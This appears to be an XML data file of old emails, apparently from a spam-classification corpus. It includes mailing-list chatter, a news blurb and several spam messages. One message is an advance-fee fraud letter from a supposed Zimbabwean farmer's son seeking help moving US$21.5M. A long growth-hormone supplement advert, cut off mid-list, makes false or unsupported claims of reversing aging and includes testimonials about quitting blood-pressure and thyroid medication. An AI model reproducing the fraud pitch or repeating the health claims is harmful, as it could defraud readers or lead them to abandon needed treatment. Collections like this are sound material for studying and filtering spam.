                   Financial reports of qualified retirement and welfare =
 benefit plans of U.S. employers&lt;br&gt;
                   &lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"40" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-4.gif" width=3D"40" =
 height=3D"20"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;IRS Form 5310&lt;/b&gt;&lt;br&gt;
                   Companies who have applied to the IRS to terminate =
 their retirement plan&lt;br&gt;
                   &lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"40" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-4.gif" width=3D"40" =
 height=3D"20"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Public Pension Funds&lt;/b&gt;&lt;br&gt;
                   Summary data on pension funds for state, county and =
 municipal government employees&lt;br&gt;
                   &lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"40" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-4.gif" width=3D"40" =
 height=3D"20"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Terminating Pension Plans&lt;/b&gt;&lt;br&gt;
                   Defined benefit plans that recently teminated as filed =
 with the Pension Benefit Guaranty Corporation&lt;br&gt;
                   &lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"40" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-4.gif" width=3D"40" =
 height=3D"20"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;EIN Finder&lt;/b&gt;&lt;br&gt;
                   Find that tax identification number you need! Over 1.3 =
 million in our database&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td align=3D"center"&gt;&lt;br&gt;
             &lt;a href=3D"http://www.freeerisa.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-501.gif" width=3D"533" =
 height=3D"33" border=3D"0" alt=3D"Click Here to register for FREE =
 Today!"&gt;&lt;br&gt;
 						&lt;img src=3D"http://iiq.us/images/freeerisa/20020510-502.gif" =
 width=3D"154" height=3D"68" border=3D"0" alt=3D"Free"&gt;
 						&lt;img src=3D"http://iiq.us/images/freeerisa/20020510-503.gif" =
 width=3D"213" height=3D"68" border=3D"0" alt=3D"ERISA"&gt;
 						&lt;img src=3D"http://iiq.us/images/freeerisa/20020510-504.gif" =
 width=3D"166" height=3D"68" border=3D"0" alt=3D".com"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center" bgcolor=3D"#A50008"&gt;&lt;a =
 href=3D"http://www.freeerisa.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-2.gif" width=3D"188" =
 height=3D"102" border=3D"0" alt=3D"FreeERISA.com - Free access to =
 pension and benefit data"&gt;&lt;/a&gt;&lt;/td&gt;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 Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_4A62C_01C204E3.5E68D0D0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Funny News story #1
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- Martin Adamson &lt;martin@srv0.ems.ed.ac.uk&gt;
 wrote:
 &gt; 
 &gt; &gt; Two demonstrators heading to Saturday's
 &gt; anti-war
 &gt; &gt; march in San Francisco were critically
 &gt; injured
 &gt; &gt; when their heads, sticking through the roof
 &gt; of a
 &gt; &gt; former school bus, hit the top of the
 &gt; Broadway
 &gt; &gt; Tunnel.
 &gt; 
 &gt; Not quite so funny as they both subsequently
 &gt; died, I think.
 &gt; 
   Broadly, I was trying to be both vulgar and
 ironic. In a "big city" as small as San Francisco
 there is, as I believe I stated in the initial
 post, maybe ONE PLACE in the whole that they
 shoulda kept their heads inside. They were told
 to, they didn't, and they got what was coming to
 them. I'll feel bad about getting a sick chuckle
 out of it maybe when it happens to someone I know
 personally. Til then, haw haw haw. Like the
 Darwin awards. Get it??
           Sloanie
 __________________________________________________
 Do you Yahoo!?
 Yahoo! Mail Plus  Powerful. Affordable. Sign up now.
 http://mailplus.yahoo.com
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: More Japanese stuff
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;-- be careful when using this one.) Also, that really cute thing 
 that
 &gt; &gt;Japanese AV girls do of leaving their panties on one leg while 
 making love
 Dare I ask what a Japanese "AV girl" is? 
 timh
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/46VHAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] assistance needed
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:
 I am Bulawa Mulete JR. the son of Mr. 
 STEVE MBEKI MULETE from Zimbabwe. I am sorry this mail
 Will surprise you, though we do not know, 
 Due to the current war against white farmers in
 Zimbabwe and the support of President Robert Mugabe to
 Claim all white owned farms in our country to gain
 Favor for re-election.
 All white farmers were asked to
 Surrender their farms to the government for
 Re-distribution and infact to his political party
 Members and my father though black was the treasury
 of the farmers association and a strong member of an
 Opposition party that did not support the president
 Idea. He then ordered his party members and the police
 Under his pay row to invade my father's farm and burn
 Down everything in the farm. They killed my
 Father and took away a lot of items from his farm.
 After the death of my father, our local pastor and a
 Close friend of my father handed us over will
 Documents with instructions from my father that we
 Should leave Zimbabwe incase anything happen to him. The will 
 Documents has a certificate of deposit, confirming a deposit
 Kept in custody for us in a security company unknown
 To the company that the content is money hence it was deposited as 
 Personal belongings and ensure that we do not remain here as we could
 Easily be found by his enemies. The total amount is
 US$21.5M.We are therefore soliciting for
 Your assistance to help us move the fund out of
 Zimbabwe, as our fate and future is far from
 reality, hence this mail to you. The president's present ban of
 International Press into Zimbabwe and the drop from office of the 
 Finance Minister to avoid giving white farmers fund Transfer
 Clearance above US$1M is just a few of the
 Unthinkable things he is committing in my Country.
 I have tried to reach my father's close friend Mr.
 John Casahans from Australia also a farmer who was
 Leaving in Zimbabwe with us but left with his family
 Late last year following this ugly development to no
 Avail.
 Should you be interested to help us, contact me
 Immediately via email for easy communication and I
 Will furnish you with the time frame and modalities of
 the transaction. We have concluded a wonderful plan of 
 Caring out the transfer within two weeks. Please note that 
 This transaction is100% confidential and risk free and will 
 Not endanger you or us in any way. We have resolved to give you 20%
 Of the total sum upon confirmation of the fund in any
 Account of your choice were the incident of taxation
 will not take much tool on the money and we look
 Forward to coming over to your country to invest our
 Share and settle there. I will a private
 Phone so that our conversation can be
 100% confidential.
 NOTE: DO REPLY TO bulmulete@golfemail.com
 God bless you indeed as you help yourself and us.
 Mr. BULAWA  MULETE JR
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blair attacks new culture of cynicism
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8358764,215/
 Date: 2002-09-29T01:41:02+01:00
 PM rules out compromise on public service reform in hard-hitting pre-conference 
 interview.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Personal Alcohol Detector 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;x-html&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;For your safe drive...and keep your safety with PersonalAlcoholDetector..&lt;/title&gt;
 &lt;meta name="generator" content="Namo WebEditor v4.0"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"&gt;
 &lt;font face="Garamond" size="2"&gt;Removal Instructions are at the end of this letter. Thank you&lt;/font&gt;&lt;p&gt;&lt;font face="Garamond"&gt;For your safe drive...and keep your safety with Personal Alcohol Detector..&lt;br&gt;&lt;img src="http://my.dreamwiz.com/tradehd/images/a.jpg" width="80" height="101" border="0" align="left"&gt;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;P align="left"&gt;&lt;font face="Garamond"&gt;The key technology for the function and performance of &lt;br&gt;
 &lt;/font&gt;&lt;font face="Garamond" color="red"&gt;Personal Alcohol Detector&lt;/font&gt;&lt;font face="Garamond"&gt; is the gas sensor. &amp;nbsp;&lt;br&gt;We  use Advanced MEMS Gas Sensor
 with high accuracy.&lt;br&gt;We are a reliable source of alcohol detectors in Korea
 and are lookng
 for &lt;/font&gt;&lt;font face="Garamond" color="red"&gt;resellers, distributors to represent&lt;/font&gt;&lt;font face="Garamond"&gt; this product. &lt;br&gt;If you are interested in dealing
 please feel free to contact us.&lt;br&gt;&lt;br&gt;Sincerely Yours,&lt;br&gt;&lt;br&gt;Alcohol org
 Inc.&lt;br&gt;Mr.Paul Smith&lt;br&gt;Tel : 82-2-459-3123&lt;br&gt;Fax : 82-2-3411-3118&lt;br&gt;&lt;br&gt;***&lt;/font&gt;&lt;font face="Garamond" size="2"&gt;Removal Instructions***&lt;br&gt;&lt;/font&gt;&lt;FONT face="Garamond" size="2"&gt;We respect your privacy and we want you to be happy. If
 you wish to unsubscribe &lt;/FONT&gt;&lt;FONT size="2" face="Garamond"&gt;from mailing list please &lt;/FONT&gt;&lt;a href="http://www.emmarket.com/del.php?table_name=a1119813" target="_blank"&gt;&lt;FONT size="2" face="Garamond" color="red"&gt;click
 here&lt;/FONT&gt;&lt;/a&gt;&lt;FONT size="2" face="Garamond"&gt;. We will never send you again
 and apologize for your inconvenience caused.&lt;/FONT&gt;&lt;/P&gt;&lt;/body&gt;
 &lt;/html&gt;
 &lt;/x-html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW:
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY bgColor=3D#000000&gt;
 &lt;FONT face=3D"Times New Roman"&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; Would you like to&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  look and feel 10-20 years younger&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ? &lt;BR&gt;
 &lt;BR&gt;
 Would you be interested in&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  increasing energy levels&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  by&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  84%&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ?&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#000080"&gt;  &lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#804040"&gt;&lt;I&gt; 15x&lt;/I&gt;&lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#804040"&gt;&lt;B&gt; &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; How about&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  Increasing Sexual Potency Frequency&lt;/B&gt;&lt;/FONT=
 &gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  by &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; 75%&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ? &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; Would you like to&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  increase your Muscle Strength &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; by &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; 88%&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; While...At the same time... &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; Reducing Body Fat&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  by &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; 72%&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  and &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; Wrinkles&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  by &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; 51%?&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 Of course you would! We offer the Most Potent Oral GH Formula available to=
  help you achieve all of this and more! Turn Back The Clock and Turn Up th=
 e Energy Now! &lt;BR&gt;
 In thousands of clinical studies, GH has been shown to accomplish the foll=
 owing: &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Reduce body fat and build lean muscle withou=
 t exercise!&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Enhance sexual performance&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Remove wrinkles and cellulite&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Lower blood pressure and improve cholesterol=
  profile&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Improve sleep, vision and memory&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Restore hair color and growth&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Strengthen the immune system&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Increase energy and cardiac output&lt;/B&gt;&lt;/FONT=
 &gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Turn back your body's biological time clock =
 10-20 years in 6 months of usage !!!&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 Here is a sample of just a few of the letters we receive every week &lt;BR&gt;
 thanking us for what our product has done:&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; "I am astounded! The day before I started taki=
 ng the GH1, &lt;BR&gt;
 I took blood tests. Then I began using the GH1 as directed. &lt;BR&gt;
 After 8 weeks I took blood tests again. &lt;BR&gt;
 My IGF-1 level (evidence of GH) showed a 70% increase! &lt;BR&gt;
 Furthermore, my cholesterol score went from 190 down to 144! &lt;BR&gt;
 I definitely feel better overall and certainly have more energy. &lt;BR&gt;
 To say the least I am very impressed and pleased with GH1. &lt;BR&gt;
 My "biological" age is now that of a 40 year old!" &lt;BR&gt;
 -Dr. A. Zuckerman M.D., age 60, NY &lt;BR&gt;
 &lt;BR&gt;
 "A year ago, my blood pressure was 180/120 and I was on blood &lt;BR&gt;
 pressure medication. I also started the Anti-Aging formula, GH1. &lt;BR&gt;
 After a year on the product, my blood pressure is now 120/80-- &lt;BR&gt;
 and I haven't been on the blood pressure medication for months!" &lt;BR&gt;
 -Susanne Peters, Laguna Beach, CA &lt;BR&gt;
 &lt;BR&gt;
 "After 2 weeks on Anti-Aging Formula GH1, I noticed a higher &lt;BR&gt;
 level of energy, increased sexual energy and my memory and vision &lt;BR&gt;
 were enhanced. My blood pressure is down to 126/84 after workout-and &lt;BR&gt;
 it seems every other day I have to 'rev-up' the amps on the treadmill &lt;BR&gt;
 at the gym. I've noticed a tightening of the skin under my chin and &lt;BR&gt;
 a change in my lungs with much easier breathing. After 4 months, &lt;BR&gt;
 I only need 5 hours sleep instead of 7. One morning, I had to do an extra =
 &lt;BR&gt;
 karate workout just to expend all the extra energy!" "After 6 months on &lt;B=
 R&gt;
 GH1, my blood sugar levels went from 130 down to 65! Also, my stamina has =
 &lt;BR&gt;
 increased, as well as my energy and sex drive--this product is GREAT!" &lt;BR=
 &gt;
 -Dr. Richard Boyd, 78 years old, Harvard Clinical Psychologist, CA &lt;BR&gt;
 &lt;BR&gt;
 "As a straight-ahead bicycle racer, I used to have to wait a minute &lt;BR&gt;
 and a half after sprinting, for my heart rate to come down to where &lt;BR&gt;
 I could sprint again. After a month on GH1, I can now sprint again &lt;BR&gt;
 after only 45 seconds! GH1 cut my waiting time in half!" &lt;BR&gt;
 -Ed Caz, age 40, Fresno,CA &lt;BR&gt;
 &lt;BR&gt;
 "When I heard GH1 would reduce body fat increase lean muscle WITHOUT EXERC=
 ISE, I couldn't believe it--but in just a few months I lost 4 inches aroun=
 d my waist without exercising and my body fat went from 22 down to 19--eve=
 n though I gained 10 pounds! Also, after 4 months, my fine vision returned=
 . I no longer need the magnifying glasses to read fine print." &lt;BR&gt;
 -Larry Baker, age 54,Oceanside, CA &lt;BR&gt;
 &lt;BR&gt;
 "I have been taking Anti-Aging Formula GH1 for five months now. &lt;BR&gt;
 I have been under great stress in my business. &lt;BR&gt;
 I believe that taking Anti-Aging Formula GH1 has had a big part in keeping=
  &lt;BR&gt;
 my energy level up and having the strength to stay positive in the midst &lt;=
 BR&gt;
 of discouraging circumstances. Last week I came down with a cold. &lt;BR&gt;
 Colds are tough on me and seem to run their course- headaches, sinus infla=
 mmation, and then throat. I am progressing through those stages but more q=
 uickly than before. Hallelujah! My eyes aren't as puffy and the skin on my=
  hands snaps back faster. &lt;BR&gt;
 My muscles seem to have better tone-I notice it in my legs-and I have more=
  energy &lt;BR&gt;
 when I go out walking." &lt;BR&gt;
 - Carolyn Munn &lt;BR&gt;
 &lt;BR&gt;
 "I was taking injections of GH for over one year. A friend suggested that =
 &lt;BR&gt;
 I try Anti-Aging Formula GH1, since I was spending 1,000 US dollars a mont=
 h and needed &lt;BR&gt;
 a doctor to inject it daily. In 2-3 weeks I felt better from the Anti-Agin=
 g &lt;BR&gt;
 Formula GH1 than the whole time I was getting the injections. &lt;BR&gt;
 Thank you Anti-Aging Formula for greatly helping to improve my life!" &lt;BR&gt;
 -Rita Mills McCoy &lt;BR&gt;
 &lt;BR&gt;
 "I have had elevated cholesterol levels since the first time I was tested,=
  &lt;BR&gt;
 in my twenties. I was on Anti-Aging Formula GHI for only 1 month when my l=
 evels &lt;BR&gt;
 dropped from 245 to 210. I could hardly believe it! After 3 months on Anti=
 -Aging &lt;BR&gt;
 Formula GH1 my gray hair began to darken at the roots, returning to its no=
 rmal &lt;BR&gt;
 coloring. I have even been able to reduce my thyroid medication. All of th=
 is &lt;BR&gt;
 without having to change anything else about my lifestyle, other than taki=
 ng &lt;BR&gt;
 few sprays of Anti-Aging Formula GH1 a day. Wow! &lt;BR&gt;
 -Alan Ross, 43 years old &lt;BR&gt;
 &lt;BR&gt;
 GH1 is the highest concentration of orally administered GH1 &lt;BR&gt;
 available on the market today. Injections of GH taken in international uni=
 ts are usually prescribed to be taken as a shot, two times per day. The in=
 dividual would be taking between 2 and 4 units per day. GH1 has over 2000n=
 g per dosage and was created to imitate the body's natural secretion of GH=
 . &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; WHAT IS GROWTH HORMONE (GH)?&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 Growth hormone is a naturally occurring substance in the human body which =
 &lt;BR&gt;
 is secreted by the pituitary, the master gland of the body, located in the=
  &lt;BR&gt;
 endocrine system. GH is a microscopic protein substance that is chemically=
  &lt;BR&gt;
 similar to insulin, which is secreted in short pulses during the first few=
  &lt;BR&gt;
 hours of sleep and after exercise. GH is one of the most abundant hormones=
  &lt;BR&gt;
 secreted, influencing growth of cells, bones, muscles and organs throughou=
 t &lt;BR&gt;
 the body. Production of GH peaks at adolescence. &lt;BR&gt;
 &lt;BR&gt;
 Every three years approximately 90% of the cells in the human body are new=
 ly made. &lt;BR&gt;
 The body is composed of more than 100 trillion cells that are continuously=
  &lt;BR&gt;
 dying and regenerating. The brain and the nervous system retain their orig=
 inal &lt;BR&gt;
 cells; however, in the brain new proteins are continuously being produced =
 to &lt;BR&gt;
 store memories of every new experience. Overall intelligence and the abili=
 ty &lt;BR&gt;
 to learn and memorize all depend on adequate growth hormone. &lt;BR&gt;
 &lt;BR&gt;
 Growth hormone replacement therapy is now available to reverse age-related=
  symptoms, including wrinkling of the skin, increased body fat, decreased =
 muscle mass, increased cholesterol, decreased stamina and energy, decrease=
 d mental function and loss of libido. &lt;BR&gt;
 When growth hormone falls below normal levels, supplementation offers the =
 &lt;BR&gt;
 all-natural potential for great benefit. Growth hormone is an amazing subs=
 tance &lt;BR&gt;
 which is safe and effective with no known side effects, if taken in the &lt;B=
 R&gt;
 proper dosage amounts. &lt;BR&gt;
 &lt;BR&gt;
 GH is one of many endocrine hormones, such as estrogen, progesterone, test=
 osterone, &lt;BR&gt;
 melatonin and DHEA, that all decline in production as we age. Hormones are=
  tiny &lt;BR&gt;
 chemical messengers continuously secreted in the bloodstream in order to r=
 egulate &lt;BR&gt;
 the activities of the vital organs. The word "hormone" is derived from a G=
 reek word &lt;BR&gt;
 meaning to stimulate. Many of these hormones can be replaced to deter some=
  of the &lt;BR&gt;
 effects of aging; however, GH reaches far beyond the scope of these other =
 &lt;BR&gt;
 hormones. Not only does it prevent biological aging, but it acts to greatl=
 y &lt;BR&gt;
 reverse a broad range of signs and symptoms associated with aging, includi=
 ng &lt;BR&gt;
 making the skin more elastic and causing wrinkles to disappear. GH also &lt;B=
 R&gt;
 helps restore hair color and hair loss. &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; &lt;BR&gt;
 THE ETERNAL FOUNTAIN OF YOUTH?&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 Our bodies naturally produce GH in abundance when we are young, and its pr=
 oduction &lt;BR&gt;
 gradually slows over time. The amount of GH after the age of 21 falls abou=
 t 14% per &lt;BR&gt;
 decade, so that its production is reduced in half by age 60. While GH is n=
 ot new, &lt;BR&gt;
 its availability as a supplement has been limited. Specialized clinics and=
  physicians &lt;BR&gt;
 have been using GH for over 30 years on thousands of patients with consist=
 ent results. &lt;BR&gt;
 Unfortunately, due to the high costs previously associated with GH, only t=
 he medical &lt;BR&gt;
 profession and the wealthy have been privy to its benefits. Another proble=
 m has been &lt;BR&gt;
 that the large GH molecule, composed of 191 amino acids (protein), had bee=
 n only &lt;BR&gt;
 effective administered through injections. However, a new technology devel=
 oped by &lt;BR&gt;
 Anti-Aging Inc., now makes GH an effective, affordable and convenient alte=
 rnative. &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; &lt;BR&gt;
 GH production falls by 80% from age 21 to 61&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; &lt;BR&gt;
 Growth hormone declines with age in every animal species that has been tes=
 ted to date. &lt;BR&gt;
 The amount of decline in humans falls approximately 14% per decade. &lt;BR&gt;
 This results in the growth hormone production rate being reduced in half b=
 y the age &lt;BR&gt;
 of 60. Humans produce on a daily basis 500 micrograms per year at age 20, =
 &lt;BR&gt;
 200 micrograms at age 40 and 25 micrograms at 80 years of age. Between the=
  ages &lt;BR&gt;
 of 70 and 80, nearly everyone is deficient in growth hormone which results=
  in SDS, &lt;BR&gt;
 or Somatotrophin Deficiency Syndrome. These symptoms are part of the disea=
 se called &lt;BR&gt;
 aging which the medical community has determined is not a normal occurrenc=
 e. &lt;BR&gt;
 Healing ability and energy levels decrease, as does physical mobility. &lt;BR=
 &gt;
 Those who want to maintain their youthful vitality and stamina should incl=
 ude &lt;BR&gt;
 an effective growth hormone therapy as part of their health regimen.&lt;/B&gt;&lt;/=
 FONT&gt;
 &lt;FONT face=3D"Times New Roman"&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 After numerous clinical studies, the following was determined &lt;BR&gt;
 after 6 or more months of GH therapy: &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; _ Improved memory &lt;BR&gt;
 _ Regenerating of the brain, heart, liver, pancreas, spleen, kidneys and o=
 ther organs &lt;BR&gt;
 _ Increased sexual drive and performance &lt;BR&gt;
